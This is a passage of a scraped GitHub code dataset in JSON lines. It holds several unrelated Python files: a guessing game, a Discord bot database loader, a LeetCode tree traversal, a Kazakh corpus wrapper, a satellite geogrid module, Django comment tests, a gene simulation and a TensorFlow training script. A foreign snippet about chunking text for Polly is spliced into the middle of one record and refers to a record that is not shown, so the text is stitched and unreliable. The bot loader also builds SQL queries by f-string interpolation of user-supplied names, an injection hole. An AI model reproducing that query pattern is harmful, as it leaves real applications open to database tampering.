1, 1,-1,-1,-1, 0, 0]\n n_y = [0, 1,-1, 0, 1,-1, 1,-1]\n for i in range(8):\n d_x = x + n_x[i]\n d_y = y + n_y[i]\n\n if 0<=d_x < h and 0<=d_y number:\r\n print(\"Число больше загаданого\")\r\n elif guess == number:\r\n break\r\n\r\nif guess == number:\r\n if guess_made == 1:\r\n print(f\"{name}, ты угадал число за {guess_made} ход! :)\")\r\n elif guess_made >= 2 and guess_made <= 4:\r\n print(f\"{name}, ты угадал число за {guess_made} хода! :)\")\r\n else:\r\n print(f\"{name}, ты угадал число за {guess_made} ходов! :)\")\r\nelse:\r\n print(f\"Извини, {name} - в следующий раз получится! 
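# The app.py record above splits each post into 1500-character pieces before
# sending it to Polly (the MyString m/1500 trick). A plain function does the
# same without the operator overload; the 1500 cap only mirrors that record,
# the real Polly request limits depend on the API call and voice type.
def chunk_text(text, size=1500):
    return [text[i:i + size] for i in range(0, len(text), size)]

assert chunk_text("abcdefg", size=3) == ["abc", "def", "g"]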
:(\")\r\n print(f\"RandomGame загадала число - {number}\")\r\n ","repo_name":"Leevladislove/Python_Projects","sub_path":"random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71134447931","text":"import sqlite3\nimport discord\nfrom random import random as rand\nfrom CommandTemplate import CommandTemplate as template\nfrom sqlite3 import Error\n\nclass SqlLoader:\n # Load and test the database\n def create_connection(self, db_file):\n \"\"\" Creates the connection to the SQLite database \"\"\"\n self.conn = None\n try:\n self.conn = sqlite3.connect(db_file)\n if db_file == 'ranks.db':\n self.ranks_db_file = db_file\n self.create_new_ranks_db()\n elif db_file == 'commands.db':\n self.cmds_db_file = db_file\n self.create_new_cmds_db()\n else:\n self.db_file = db_file\n print(f'Connected to {db_file}!')\n try:\n c = self.conn.cursor()\n except Error:\n if db_file == 'ranks.db':\n self.create_new_ranks_db()\n elif db_file == 'commands.db':\n self.create_new_cmds_db()\n else:\n print('Invalid database')\n except Error as e:\n print(e)\n finally:\n if self.conn:\n self.conn.close()\n\n # Ranks Database\n def add_xp_to_user(self, user, guild):\n \"\"\" Adds XP to a given user in a certain server \"\"\"\n self.conn = sqlite3.connect(self.ranks_db_file)\n c = self.conn.cursor()\n try:\n c.execute(f\"SELECT xp FROM ranks WHERE user = {user} AND guild = {guild}\")\n current_xp_value = c.fetchone()\n new_xp_value = current_xp_value[0] + round(rand() * 20) + 1\n c.execute(f\"UPDATE ranks SET xp = {new_xp_value} WHERE user = {user} AND guild = {guild}\")\n except TypeError:\n start_xp_value = round(rand() * 20) + 1\n c.execute(f\"INSERT INTO ranks VALUES ('{guild}','{user}','{start_xp_value}')\")\n self.conn.commit()\n self.conn.close()\n\n def get_rank(self, user, guild):\n \"\"\" Gets the level and xp of a user in a certain server \"\"\"\n self.conn = sqlite3.connect(self.ranks_db_file)\n c = self.conn.cursor()\n try:\n c.execute(f\"SELECT xp FROM ranks WHERE user = {user} AND guild = {guild}\")\n current_xp_value = c.fetchone()\n return int(current_xp_value[0])\n except TypeError:\n return 0\n self.conn.commit()\n self.conn.close()\n\n def create_new_ranks_db(self):\n \"\"\" Creates the table in case it does not exist yet \"\"\"\n c = self.conn.cursor()\n c.execute('''CREATE TABLE ranks\n (guild int, user int, xp int)''')\n self.conn.commit()\n self.conn.close()\n\n # Commands database\n def get_commands(self, guild):\n \"\"\" Gets all of the given commands of a server \"\"\"\n self.conn = sqlite3.connect(self.cmds_db_file)\n c = self.conn.cursor()\n try:\n c.execute(f\"SELECT * FROM commands WHERE guild = {guild}\")\n return c.fetchall()\n except TypeError:\n return None\n\n def run_command(self, guild, user, arg1, name):\n \"\"\" Executes the custom command of a server \"\"\"\n self.conn = sqlite3.connect(self.cmds_db_file)\n c = self.conn.cursor()\n c.execute(f\"SELECT * FROM commands WHERE guild = {guild} AND command = '{name}'\")\n row = c.fetchone()\n temp = template(user, arg1, row[1], row[2], row[3], row[4], url=row[5], min=row[6], max=row[7])\n return temp.embed\n\n def create_new_cmds_db(self):\n \"\"\" Creates the table in case it does not exist yet \"\"\"\n c = self.conn.cursor()\n c.execute('''CREATE TABLE commands\n (guild int, command text, type text, info text, description text, url text, min int, max int)''')\n self.conn.commit()\n self.conn.close()\n\n 
# Initiate the databases\n    def __init__(self):\n        self.create_connection(r\"ranks.db\")\n        self.create_connection(r\"commands.db\")\n\n\n","repo_name":"tymmc2/Hanabana","sub_path":"SqlLoader.py","file_name":"SqlLoader.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26498807377","text":"import sys\nsys.path.append('../functions/')\nfrom tree import TreeNode\nfrom typing import List\n\n\nclass Solution:\n    def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:\n    \tif root is None:\n    \t\treturn []\n    \tls, l, queue = [], [], []\n    \tqueue.append(root)\n    \tlens, count = 1, 0\n    \twhile len(queue) > 0:\n    \t\tp = queue.pop(0)\n    \t\tl.append(p.val)\n    \t\tcount += 1\n    \t\tif p.left is not None:\n    \t\t\tqueue.append(p.left)\n    \t\tif p.right is not None:\n    \t\t\tqueue.append(p.right)\n    \t\tif lens == count:\n    \t\t\tls.insert(0, l.copy())\n    \t\t\tl = []\n    \t\t\tcount = 0\n    \t\t\tlens = len(queue)\n    \treturn ls\n\n","repo_name":"ZiyaoGeng/LeetCode","sub_path":"Code/107.py","file_name":"107.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12162161862","text":"from .arkhangelskiy_corpora import PageParser\n\nlanguage = 'kazakh'\nresults = 'http://web-corpora.net/KazakhCorpus/search/results.php'\n\nTEST_DATA = {'test_single_query': {'query': 'мысық'},\n             'test_multi_query': {'query': ['мысық', 'сүю']}\n             }\n\n__author__ = 'ustya-k'\n__doc__ = \\\n\"\"\"\nAlmaty Corpus of the Kazakh Language\n====================================\n \nAPI for Almaty corpus of the Kazakh language\n(http://web-corpora.net/KazakhCorpus/search/).\n \n**Search Parameters**\n\nquery: str or list([str]):\n    query or queries\nn_results: int, default 100\n    number of results wanted\nkwic: bool, default True\n    kwic format (True) or a sentence (False)\nget_analysis: bool, default False\n    tags shown (True) or not (False)\n\nExample\n-------\n\n.. code-block:: python\n\n    corp = lingcorpora.Corpus('kaz')\n    results = corp.search('тілі', n_results=10)\n    for result in results:\n        for i, target in enumerate(result):\n            print(i+1, target.text)\n\n.. 
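# A deque-based variant of the level-order traversal in the 107.py record
# above: popleft() is O(1) where list.pop(0) is O(n), and collecting levels
# then reversing once replaces the repeated insert(0, ...). TreeNode here is
# a minimal stand-in for the one imported from tree in that record.
from collections import deque

class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def level_order_bottom(root):
    if root is None:
        return []
    levels, queue = [], deque([root])
    while queue:
        level = []
        for _ in range(len(queue)):
            node = queue.popleft()
            level.append(node.val)
            if node.left:
                queue.append(node.left)
            if node.right:
                queue.append(node.right)
        levels.append(level)
    return levels[::-1]

print(level_order_bottom(TreeNode(3, TreeNode(9), TreeNode(20))))  # [[9, 20], [3]]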
parsed-literal::\n\n \"тілі\": 100%|██████████| 10/10 [00:01<00:00, 6.49docs/s]\n\n 1 Шетел тілі ана тілімен қоса баланың сөйлеу қабілетін және жалпы дамуын ғана жетілдіріп қоймайды, оны өзін қоршаған айналасындағы адамдармен қарым-қатынас мәдениетіне де үйретеді.\n 2 Ағылшын тілі сабағында тиянақты және сапалы білім беру тәрбие жұмысымен күнделікті бірлікте жүргізілуі тиісті екені күнделікті тәжірибеде дәлелденгені айқын.\n 3 Ағылшын тілі пәні бойынша білім мазмұнына тақырыптар, қарым – қатынас ситуациялары, мәтіндер, тілдік материалдар; лексикалық, грамматикалық, фонетикалық, практикалық біліктер, сөз әдептері, оқу әрекетінің тиімділігін іске асыратын жалпы оқу білік дағдылары жатады.\n 4 Халықаралық қатынастар мен бизнес, туризм,әлемдік экономика мен саясат, білім және ғылым саласы мен озықтехнология, құқық пен мәдениет салаларының халықаралық аренадағы негізгі қолданыс тілі ағылшын тілі болып отыр.\n 5 Қазіргі таңда шет тілі ретінде ағылшын тілін оқытуды жаңа сатыға көтеру отандық педагогикадағы іргелі міндеттердің біріне айналып отыр.Өйткені, елімізде Қазақстан Республикасының Президенті Н Ә Назарбаевтың бастамасымен «Үштұғырлы тіл » мәдени жобасын дамыту басымдыққа айналып, соның ішінде жаһандану жағдайында әлемдік интеграцияға кірігу тілі ретінде ағылшын тіліне мән берілуде.\n 6 Қазіргі таңда шет тілі ретінде ағылшын тілін оқытуды жаңа сатыға көтеру отандық педагогикадағы іргелі міндеттердің біріне айналып отыр.Өйткені, елімізде Қазақстан Республикасының Президенті Н Ә Назарбаевтың бастамасымен «Үштұғырлы тіл » мәдени жобасын дамыту басымдыққа айналып, соның ішінде жаһандану жағдайында әлемдік интеграцияға кірігу тілі ретінде ағылшын тіліне мән берілуде.\n 7 Халықаралық қатынастар мен бизнес, туризм,әлемдік экономика мен саясат, білім және ғылым саласы мен озықтехнология, құқық пен мәдениет салаларының халықаралық аренадағы негізгі қолданыс тілі ағылшын тілі болып отыр.\n 8 Шет тілдердің арасында ағылшын тілі баяғыда-ақ алғашқы орынды иеленді.\n 9 Кез-келген мектепті алмайык, тіпті ауылдық жерлердегі мекетептерде де ағылшын тілі қазақ б��лаларының ана тілінде жүргізілген жок.\n 10 Ағылшын тілін қазақ тілі арқылы оқып-тану өте сирек кездесетін жайт болатын.\n\n\"\"\"\n\n\nclass PageParser(PageParser):\n\n def __init__(self, *args, **kwargs):\n super().__init__(language, results, *args, **kwargs)\n","repo_name":"iddave/lingcorpora-OseCorp","sub_path":"lingcorpora/corpora/kaz_corpus.py","file_name":"kaz_corpus.py","file_ext":"py","file_size_in_byte":5172,"program_lang":"python","lang":"kk","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"1930945921","text":"'''\ncollection of functions for determing and setting geogrid\n'''\n\nimport numpy as np\n\nimport journal\n\nfrom osgeo import osr\n\nimport isce3\nfrom nisar.products.readers import SLC\n\n\ndef _grid_size(stop, start, sz):\n '''\n get grid dim based on start, end, and grid size inputs\n '''\n # check for invalid and return invalid size value\n if None in [stop, start, sz]:\n return np.nan\n\n return int(np.ceil(np.abs((stop-start)/sz)))\n\n\ndef create(cfg, workflow_name=None, frequency_group=None,\n frequency=None, geocode_dict=None,\n default_spacing_x=None, default_spacing_y=None,\n is_geo_wrapped_igram=False):\n '''\n - frequency_group is the name of the sub-group that\n holds the fields x_posting and y_posting, which is usually\n the frequency groups \"A\" or \"B\". 
If these fields\n    are direct members of the output_posting group, e.g.\n    for radar_grid_cubes, the frequency_group should be left\n    as None.\n    - frequency is the frequency name; if not provided, it will be\n    the same as the frequency_group.\n    - geocode_dict overwrites the default geocode_dict from\n    processing.geocode\n    - default_spacing_x is the default pixel spacing in the X-direction\n    - default_spacing_y is the default pixel spacing in the Y-direction\n    - is_geo_wrapped_igram is the flag indicating whether the geogrid is for\n    the wrapped interferogram.\n    For production we only fix the EPSG code and snap values, and rely on the\n    RSLC product metadata to compute the bounding box of the geocoded products.\n    There is a placeholder in the SLC product for computing the bounding box;\n    when that method is populated we should be able to simply write\n    bbox = self.slc_obj.computeBoundingBox(epsg=state.epsg)\n    For now, rely on the run config input.\n    '''\n    error_channel = journal.error('geogrid.create')\n\n    # unpack and init\n    if geocode_dict is None:\n        geocode_dict = cfg['processing']['geocode']\n\n    if workflow_name == 'insar':\n        input_hdf5 = cfg['input_file_group']['reference_rslc_file']\n    else:\n        input_hdf5 = cfg['input_file_group']['input_file_path']\n    dem_file = cfg['dynamic_ancillary_file_group']['dem_file']\n    slc = SLC(hdf5file=input_hdf5)\n\n    # unpack and check cfg dict values. default values set to trigger inside fix(...)\n    epsg = geocode_dict['output_epsg']\n    start_x = geocode_dict['top_left']['x_abs']\n    start_y = geocode_dict['top_left']['y_abs']\n\n    if frequency is None:\n        frequency = frequency_group\n\n    # whether to geocode the wrapped interferogram\n    geo_wrapped_igram = (workflow_name == 'insar') and is_geo_wrapped_igram\n\n    output_posting_group = geocode_dict['output_posting']\\\n        if not geo_wrapped_igram else geocode_dict['wrapped_interferogram']\n\n    if frequency_group is None:\n        spacing_x = output_posting_group['x_posting']\n        spacing_y = output_posting_group['y_posting']\n    else:\n        if geo_wrapped_igram:\n            spacing_x = output_posting_group['output_posting']\\\n                [frequency_group]['x_posting']\n            spacing_y = output_posting_group['output_posting']\\\n                [frequency_group]['y_posting']\n        else:\n            spacing_x = output_posting_group[frequency_group]['x_posting']\n            spacing_y = output_posting_group[frequency_group]['y_posting']\n\n    end_x = geocode_dict['bottom_right']['x_abs']\n    end_y = geocode_dict['bottom_right']['y_abs']\n\n    assert epsg is not None\n    assert 1024 <= epsg <= 32767\n\n    if spacing_y is not None:\n\n        # spacing_y from runconfig should be positive valued\n        assert spacing_y > 0.0\n        spacing_y = -1.0 * spacing_y\n\n    # copy X spacing from default X spacing (if applicable)\n    if spacing_x is None and default_spacing_x is not None:\n        spacing_x = default_spacing_x\n\n    # copy Y spacing from default Y spacing (if applicable)\n    if spacing_y is None and default_spacing_y is not None:\n        spacing_y = default_spacing_y\n\n    if spacing_x is None or spacing_y is None:\n        dem_raster = isce3.io.Raster(dem_file)\n\n        # Set pixel spacing using the input DEM (same EPSG)\n        if epsg == dem_raster.get_epsg():\n\n            # copy X spacing from DEM\n            if spacing_x is None:\n                spacing_x = dem_raster.dx\n\n                # DEM X spacing should be positive\n                if spacing_x <= 0:\n                    err_str = f'Expected positive pixel spacing in the X/longitude direction'\n                    err_str += f' for DEM {dem_file}. 
Actual value: {spacing_x}.'\n error_channel.log(err_str)\n raise ValueError(err_str)\n\n # copy Y spacing from DEM\n if spacing_y is None:\n spacing_y = dem_raster.dy\n\n # DEM Y spacing should be negative\n if spacing_y >= 0:\n err_str = f'Expected negative pixel spacing in the Y/latitude direction'\n err_str += f' for DEM {dem_file}. Actual value: {spacing_y}.'\n error_channel.log(err_str)\n raise ValueError(err_str)\n\n else:\n epsg_spatial_ref = osr.SpatialReference()\n epsg_spatial_ref.ImportFromEPSG(epsg)\n\n # Set pixel spacing in degrees (lat/lon)\n if epsg_spatial_ref.IsGeographic():\n if spacing_x is None:\n spacing_x = 0.00017966305682390427\n if spacing_y is None:\n spacing_y = -0.00017966305682390427\n\n # Set pixel spacing in meters\n else:\n if spacing_x is None:\n spacing_x = 20\n if spacing_y is None:\n spacing_y = -20\n\n if spacing_x == 0.0 or spacing_y == 0.0:\n err_str = 'spacing_x or spacing_y cannot be 0.0'\n error_channel.log(err_str)\n raise ValueError(err_str)\n\n # init geogrid\n if None in [start_x, start_y, epsg, end_x, end_y]:\n\n # extract other geogrid params from radar grid and orbit constructed bounding box\n geogrid = isce3.product.bbox_to_geogrid(slc.getRadarGrid(frequency),\n slc.getOrbit(),\n isce3.core.LUT2d(),\n spacing_x, spacing_y, epsg)\n\n # restore runconfig start_x (if provided)\n if start_x is not None:\n end_x_from_function = geogrid.start_x + geogrid.spacing_x * geogrid.width\n geogrid.start_x = start_x\n geogrid.width = int(np.ceil((end_x_from_function - start_x) /\n geogrid.spacing_x))\n\n # restore runconfig end_x (if provided)\n if end_x is not None:\n geogrid.width = int(np.ceil((end_x - geogrid.start_x) /\n geogrid.spacing_x))\n\n # restore runconfig start_y (if provided)\n if start_y is not None:\n end_y_from_function = geogrid.start_y + geogrid.spacing_y * geogrid.length\n geogrid.start_y = start_y\n geogrid.length = int(np.ceil((end_y_from_function - start_y) /\n geogrid.spacing_y))\n\n # restore runconfig end_y (if provided)\n if end_y is not None:\n geogrid.length = int(np.ceil((end_y - geogrid.start_y) /\n geogrid.spacing_y))\n\n else:\n width = _grid_size(end_x, start_x, spacing_x)\n length = _grid_size(end_y, start_y, -1.0*spacing_y)\n\n # build from probably good user values\n geogrid = isce3.product.GeoGridParameters(start_x, start_y,\n spacing_x, spacing_y,\n width, length, epsg)\n\n # recheck x+y end points before snap and length+width calculation\n end_pt = lambda start, sz, spacing: start + spacing * sz\n\n if end_x is None:\n end_x = end_pt(geogrid.start_x, geogrid.spacing_x, geogrid.width)\n\n if end_y is None:\n end_y = end_pt(geogrid.start_y, geogrid.spacing_y, geogrid.length)\n\n # snap all the things\n x_snap = geocode_dict['x_snap']\n y_snap = geocode_dict['y_snap']\n\n # Change the snap if it is to geocode the wrapped interferogram\n if geo_wrapped_igram:\n x_snap = output_posting_group['x_snap']\n y_snap = output_posting_group['y_snap']\n\n if x_snap is not None or y_snap is not None:\n # check snap values before proceeding\n if x_snap <= 0 or y_snap <= 0:\n err_str = 'Snap values must be > 0.'\n error_channel.log(err_str)\n raise ValueError(err_str)\n\n if x_snap % spacing_x != 0.0 or y_snap % spacing_y != 0:\n err_str = 'Snap values must be exact multiples of spacings. i.e. 
snap % spacing == 0.0'\n error_channel.log(err_str)\n raise ValueError(err_str)\n\n snap_coord = lambda val, snap, round_func: round_func(float(val) / snap) * snap\n geogrid.start_x = snap_coord(geogrid.start_x, x_snap, np.floor)\n geogrid.start_y = snap_coord(geogrid.start_y, y_snap, np.ceil)\n end_x = snap_coord(end_x, x_snap, np.ceil)\n end_y = snap_coord(end_y, y_snap, np.floor)\n geogrid.length = _grid_size(end_y, geogrid.start_y, geogrid.spacing_y)\n geogrid.width = _grid_size(end_x, geogrid.start_x, geogrid.spacing_x)\n\n return geogrid\n","repo_name":"isce-framework/isce3","sub_path":"python/packages/nisar/workflows/geogrid.py","file_name":"geogrid.py","file_ext":"py","file_size_in_byte":9462,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"78"} +{"seq_id":"32602675619","text":"import mock\n\nfrom datetime import datetime\n\nfrom django.contrib import comments\nfrom django.test import TestCase\n\nfrom ella.core.cache.redis import client\nfrom ella.utils.test_helpers import create_basic_categories, create_and_place_a_publishable\nfrom ella.utils.timezone import utc_localize, use_tz\n\nfrom ella_comments import listing_handlers\n\nfrom nose import tools, SkipTest\n\nfrom test_ella_comments.helpers import create_comment\n\n\nclass TestListingHandlers(TestCase):\n def setUp(self):\n if not client:\n raise SkipTest()\n\n super(TestListingHandlers, self).setUp()\n create_basic_categories(self)\n create_and_place_a_publishable(self)\n client.flushdb()\n\n def test_aa(self):\n day = datetime.now().strftime('%Y%m%d')\n create_comment(self.publishable, self.publishable.content_type, user_name='kvbik', submit_date=utc_localize(datetime(2010, 10, 10, 10, 10, 10)))\n ct_id = self.publishable.content_type_id\n tools.assert_equals(set([\n 'slidingccount:WINDOWS',\n 'slidingccount:KEYS',\n\n 'comcount:2',\n 'lastcom:2',\n 'slidingccount:2',\n\n 'comcount:c:1',\n 'comcount:c:2',\n 'lastcom:c:1',\n 'lastcom:c:2',\n 'slidingccount:c:1',\n 'slidingccount:c:2',\n\n 'lastcom:d:1',\n 'lastcom:d:2',\n 'comcount:d:1',\n 'comcount:d:2',\n 'slidingccount:d:1',\n 'slidingccount:d:2',\n\n 'lastcom:ct:%d' % ct_id,\n 'comcount:ct:%d' % ct_id,\n 'slidingccount:ct:%d' % ct_id,\n\n\n 'lastcom:pub:%d:1' % ct_id,\n 'comcount:pub:%d:1' % ct_id,\n\n\n 'slidingccount:2:%s' % day,\n 'slidingccount:c:1:%s' % day,\n 'slidingccount:c:2:%s' % day,\n 'slidingccount:d:1:%s' % day,\n 'slidingccount:d:2:%s' % day,\n 'slidingccount:ct:%d:%s' % (ct_id, day),\n\n ]), set(client.keys('*')))\n\n if use_tz:\n # timestamps are stored in utc time\n tstamp = '1286705410.0'\n else:\n tstamp = '1286698210.0'\n tools.assert_equals({'submit_date': tstamp, 'user_id': '', 'username': 'kvbik', 'comment': '', 'url': ''}, client.hgetall('lastcom:pub:%d:1' % ct_id))\n tools.assert_equals('1', client.get('comcount:pub:%d:1' % ct_id))\n\nclass TestCommentPostSaveSignalHandler(TestListingHandlers):\n \" Unit tests for `ella_comments.listing_handlers.comment_post_save()`. \"\n def setUp(self):\n super(TestCommentPostSaveSignalHandler, self).setUp()\n\n # Assert that no comments are in the system\n tools.assert_equals(comments.get_model()._default_manager.count(), 0)\n\n # Assert that the `publishable`'s comment count does not exist yet\n tools.assert_false(client.exists(listing_handlers.COMCOUNT_KEY % (self.publishable.content_type_id, self.publishable.pk)))\n\n def _build_publishable_comment_count_key(self, publishable):\n \" Util method to consistently build the comment count key for a publishable. 
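# A tiny numeric check of the snap_coord logic in the geogrid.py record above:
# start coordinates snap with floor and end coordinates with ceil, so the
# snapped grid still covers the whole requested box. The values are made up
# for illustration.
import math

snap_coord = lambda val, snap, round_func: round_func(float(val) / snap) * snap

start_x = snap_coord(437.3, 20, math.floor)    # -> 420.0 (moved outward/west)
end_x = snap_coord(981.2, 20, math.ceil)       # -> 1000.0 (moved outward/east)
print(start_x, end_x, (end_x - start_x) / 20)  # width becomes a whole 29 cells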
\"\n return listing_handlers.COMCOUNT_KEY % (publishable.content_type_id, publishable.pk)\n\n def _create_comment(self):\n \" Util method to create and return a new commnt. \"\n return create_comment(\n self.publishable,\n self.publishable.content_type,\n user_name='kvbik',\n submit_date=utc_localize(datetime(2010, 10, 10, 10, 10, 10))\n )\n\n def test_no_change_to_comment_publicity(self):\n \"\"\"\n Assert that no change made to the `is_public` or `is_removed` properties of a\n comment result in no changes to the comment count or last comment keys of the content object.\n \"\"\"\n # Create a new public comment on the publishable\n comment = self._create_comment()\n tools.assert_equals(comments.get_model()._default_manager.count(), 1)\n tools.assert_equals(comments.get_model()._default_manager.filter(is_public=True, is_removed=False).count(), 1)\n\n # Assert that the comment count key on the publishable was set correctly to 1\n tools.assert_equals(\n int(client.get(self._build_publishable_comment_count_key(self.publishable))),\n 1\n )\n\n # Update this comment (but do not change \"publicity\") and assert that\n # nothing has changed regarding the comment count on the publishable\n comment.comment = 'New comment text'\n tools.assert_true(comment.is_public)\n tools.assert_false(comment.is_removed)\n comment.save()\n\n # Assert that the comment count key on the publishable is still set correctly to 1\n tools.assert_equals(\n int(client.get(self._build_publishable_comment_count_key(self.publishable))),\n 1\n )\n\n def test_modify_comment_publicity(self):\n \"\"\"\n Assert that a modification made to the `is_public` or `is_removed` properties of a\n comment result in changes to the comment count of the content object.\n \"\"\"\n # Create a new public comment on the publishable\n comment = self._create_comment()\n tools.assert_equals(comments.get_model()._default_manager.count(), 1)\n tools.assert_equals(comments.get_model()._default_manager.filter(is_public=True, is_removed=False).count(), 1)\n\n # Assert that the comment count key on the publishable was set correctly to 1\n tools.assert_equals(\n int(client.get(self._build_publishable_comment_count_key(self.publishable))),\n 1\n )\n\n # Update this comment (and change \"publicity\" of it)\n comment.is_public = False\n comment.save()\n\n # Assert that the comment count key on the publishable has been updated to reflect\n # the fact that there are 0 public comments associated to it.\n tools.assert_equals(\n int(client.get(self._build_publishable_comment_count_key(self.publishable))),\n 0\n )\n\n @mock.patch.object(listing_handlers, 'client')\n def test_client_invoked(self, mock_client):\n \"\"\"\n Call `comment_post_save()` with a comment that has been modified,\n and assert that the client was not invoked.\n \"\"\"\n # Create a new public comment\n comment = self._create_comment()\n\n # Programatically set the `__pub_info` data on the comment\n setattr(comment, '__pub_info', {\n 'is_public': False,\n 'is_removed': True,\n })\n\n # Pass this comment to the `comment_post_save()` signal handler\n listing_handlers.comment_post_save(comment)\n\n # Assert that that client.set() was called w/ the appropriate args\n mock_client.set.assert_called_with(\n self._build_publishable_comment_count_key(self.publishable),\n 1\n )\n\n @mock.patch.object(listing_handlers, 'client')\n def test_client_not_invoked(self, mock_client):\n \"\"\"\n Call `comment_post_save()` with a comment that has not been modified,\n and assert that `client.set()` was not invoked.\n 
\"\"\"\n # Create a new public comment\n comment = self._create_comment()\n\n # Programatically set the `__pub_info` data on the comment (but DON'T CHANGE ANYTHING)\n setattr(comment, '__pub_info', {\n 'is_public': True,\n 'is_removed': False,\n })\n\n # Pass this comment to the `comment_post_save()` signal handler\n listing_handlers.comment_post_save(comment)\n\n # Assert that the `set` method was NOT called\n tools.assert_false(mock_client.set.called)\n","repo_name":"ella/ella-comments","sub_path":"test_ella_comments/test_listing_handlers.py","file_name":"test_listing_handlers.py","file_ext":"py","file_size_in_byte":7689,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"14513326764","text":"from Constant import Gene\n\n\ntarget = [1, 1, 1, 1, 1, 1]\n\n\n# 自交\ndef inbred(size, parent):\n \"\"\"\n 自交\n\n :param size: 种群个数\n :param parent: 亲本 可以是单个植株或者种群\n :return: 子代种群\n \"\"\"\n f_gene = []\n if isinstance(parent, Gene):\n for i in range(size):\n f = Gene()\n for j in range(6):\n xgene = parent.division(j)\n ygene = parent.division(j)\n f.add_gene(xgene, ygene)\n f_gene.append(f)\n\n else:\n for i in range(size):\n f = Gene()\n for j in range(6):\n xgene = parent[i].division(j)\n ygene = parent[i].division(j)\n f.add_gene(xgene, ygene)\n f_gene.append(f)\n return f_gene\n\n\n# 杂交\ndef hybrid(size, mum: Gene, dad: [Gene]):\n f_gene = []\n for i in range(size):\n f = Gene()\n for j in range(6):\n xgene = dad[i].division(j)\n ygene = mum.division(j)\n f.add_gene(xgene, ygene)\n f_gene.append(f)\n return f_gene\n\n\n# 展示\ndef dayin(gene, num=None):\n x = []\n y = []\n if num is None:\n for i in range(6):\n x.append(gene.get_gene(i, 'x'))\n y.append(gene.get_gene(i, 'y'))\n print(x, y)\n else:\n for i in range(6):\n x.append(gene[num].get_gene(i, 'x'))\n y.append(gene[num].get_gene(i, 'y'))\n print(x, y)\n\n\n#\n\n# 找到纯和\ndef find_pure(size, gene):\n \"\"\"\n 找到纯和子\n\n :param size: 种群大小\n :param gene:\n :return: 纯和子的个数\n \"\"\"\n res = 0\n for i in range(size):\n x = []\n y = []\n for j in range(6):\n x.append(gene[i].get_gene(j, 'x'))\n y.append(gene[i].get_gene(j, 'y'))\n if x == target and y == target:\n res += 1\n return res\n","repo_name":"sunoneeye1/CornNavi","sub_path":"1.0/Function.py","file_name":"Function.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1479214223","text":"\"\"\"\nscript_name: train_BiGRU_Att.py\n******************************************************\nPurpose: 训练模型\n注:详细信息见:\nDesktop/boohee_projects/base_KG/Information-Extraction-Chinese/RE_BGRU_2ATT/model.ipynb\n******************************************************\nAuthor: xuanhong li\n******************************************************\nDate: 2020-12-8\n******************************************************\nupdate: 2020-12-10 使用自己数据集\n\"\"\"\n\n\nimport tensorflow as tf\nimport numpy as np\nfrom args_help import args\nfrom re_model import arrayToTensor, REModel\n\n\nsave_path = args.checkpoints_path\nwordembedding = np.load('./datasets_RE/vec.npy')\n\ntrain_y = np.load('./datasets_RE/train_y.npy')\nclass_idx = []\nfor m in range(len(train_y)):\n idx = np.argmax(train_y[m], 0)\n class_idx.append(idx)\ntrain_y_array = np.array(class_idx)\n\ntrain_word = np.load('./datasets_RE/train_word.npy', allow_pickle=True)\ntrain_pos1 = np.load('./datasets_RE/train_pos1.npy', allow_pickle=True)\ntrain_pos2 = np.load('./datasets_RE/train_pos2.npy', 
allow_pickle=True)\n# Convert the arrays to tensors; each of the three has shape=(967, 70)\ntrain_word_a = arrayToTensor(train_word)\ntrain_pos1_a = arrayToTensor(train_pos1)\ntrain_pos2_a = arrayToTensor(train_pos2)\n\ntrain_dataset = tf.data.Dataset.from_tensor_slices((train_word_a, train_pos1_a, train_pos2_a, train_y_array))\ntrain_dataset = train_dataset.shuffle(len(train_word)).batch(args.batch_size, drop_remainder=True)\n\nmodel = REModel(args.batch_size, vocab_size=args.vocab_size, embedding_size=args.embedding_size,\n                num_classes=args.num_classes, pos_num=args.pos_num, pos_size=args.pos_size,\n                gru_units=args.gru_units, embedding_matrix=wordembedding)\noptimizer = tf.keras.optimizers.Adam(args.lr)\n\ntrain_loss = tf.keras.metrics.Mean(name='train_loss')\ntrain_metric = tf.keras.metrics.SparseCategoricalAccuracy(name='train_accuracy')\n\nckpt = tf.train.Checkpoint(optimizer=optimizer, model=model)\nckpt.restore(tf.train.latest_checkpoint(save_path))\nckpt_manager = tf.train.CheckpointManager(ckpt, save_path, checkpoint_name='model.ckpt', max_to_keep=3)\n\naccuracy = 0\nfor epoch in range(args.epoch):\n    for _, (word_batch, pos1_batch, pos2_batch, label_batch) in enumerate(train_dataset):\n        train_inputs = [word_batch, pos1_batch, pos2_batch]\n        with tf.GradientTape() as tape:\n            class_probs = model(train_inputs, training=True)\n            logits = tf.stack(class_probs, axis=0)  # stack the per-example prediction tensors\n            loss = tf.keras.losses.sparse_categorical_crossentropy(y_true=label_batch, y_pred=logits)\n        grads = tape.gradient(loss, model.variables)\n        optimizer.apply_gradients(grads_and_vars=zip(grads, model.variables))\n\n        train_loss.update_state(loss)\n        train_metric.update_state(label_batch, logits)\n\n    train_accuracy_v, train_loss_v = train_metric.result(), train_loss.result()\n    if epoch % 1 == 0:\n        print('Results for training epoch ' + str(epoch) + ':')\n        print(\"train accuracy: %f\" % train_accuracy_v)\n        print(\"train loss: %f\" % train_loss_v)\n        print('-' * 50)\n    if train_accuracy_v > accuracy:\n        accuracy = train_accuracy_v\n        ckpt_manager.save()\n\n    train_loss.reset_states()\n    train_metric.reset_states()","repo_name":"lixuanhng/NLP_related_projects","sub_path":"RE/train_BiGRU_Att.py","file_name":"train_BiGRU_Att.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"78"} 